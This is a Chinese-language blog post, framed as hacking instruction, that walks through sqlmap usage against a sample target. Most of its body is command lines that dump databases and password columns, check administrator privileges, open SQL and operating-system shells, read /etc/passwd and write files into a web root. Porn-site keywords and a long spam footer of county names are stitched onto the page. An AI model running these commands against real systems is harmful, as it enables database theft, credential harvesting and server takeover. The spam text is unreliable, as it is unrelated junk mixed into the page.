久久精品人人爽,华人av在线,亚洲性视频网站,欧美专区一二三

黑客教學之SQLmap-SQLmap介紹以及必備命令

284次閱讀
沒有評論

共計 1827 個字符,預計需要花費 5 分鐘才能閱讀完成。

SQLmap 是一種開源的滲透測試工具,主要用于檢測和利用 SQL 注入漏洞。

它能夠自動檢測目標網站是否存在 SQL 注入漏洞,并通過利用這些漏洞來獲取敏感信息、修改數據,甚至完全控制目標系統。

想要查看更多的命令可以參考用 ”sqlmap -hh” 查看完整的命令幫助文檔。

一、Sqlmap 注入篇

1、檢查注入點

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11

 

2、爆所有數據庫信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs

 

爆當前數據庫信息

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db

 

3、列出指定數據庫所有的表名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables

‘fujieace’ 為指定數據庫名稱

 

4、列出指定表名的所有列名

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns

‘admin’ 為指定表名稱

 

5、dump 打印輸出表名指定列名字段的值數據

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump

‘name,password’ 為指定字段名稱

 

二、Sqlmap 用戶權限篇

 

1、列出數據庫管理系統用戶:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users

 

查看當前連接數據庫用戶:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user

 

2、判斷當前用戶是否是 DBA?

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba

 

3、查看用戶權限:

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace

 

三、Sqlmap 文件操作與 shell 提權篇

 

1、sql shell

這里通過 sqlmap 可以直接獲取一個 sql shell,直接執行 sql 語句進行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();

 

注意:這里由于進入了 sql shell 可以執行 sql 語句了,也可以用 load data infile、load_file、into outfile 等函數來進行文件讀取或寫入;

 

2、cmd shell

這里通過 sqlmap 可以直接獲取一個 cmd shell,直接執行 cmd 命令進行交互。

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig

 

3、讀取服務器上指定文件

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt

 

4、寫入本地文件到服務器上

root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
正文完
 
丸趣
版權聲明:本站原創文章,由 丸趣 2023-05-10發表,共計1827字。
轉載說明:除特殊說明外本站除技術相關以外文章皆由網絡搜集發布,轉載請注明出處。
評論(沒有評論)
主站蜘蛛池模板: 玉屏| 望奎县| 淮滨县| 平和县| 保定市| 高碑店市| 闵行区| 碌曲县| 婺源县| 黑山县| 资中县| 萝北县| 九龙县| 洛宁县| 甘泉县| 灵寿县| 天水市| 南康市| 平远县| 新竹市| 肥东县| 罗甸县| 贵定县| 宜宾市| 锦屏县| 碌曲县| 江达县| 施甸县| 武山县| 阳东县| 平阳县| 扶余县| 高唐县| 兴国县| 托克逊县| 雅江县| 遂川县| 瑞丽市| 当阳市| 中宁县| 鲁山县|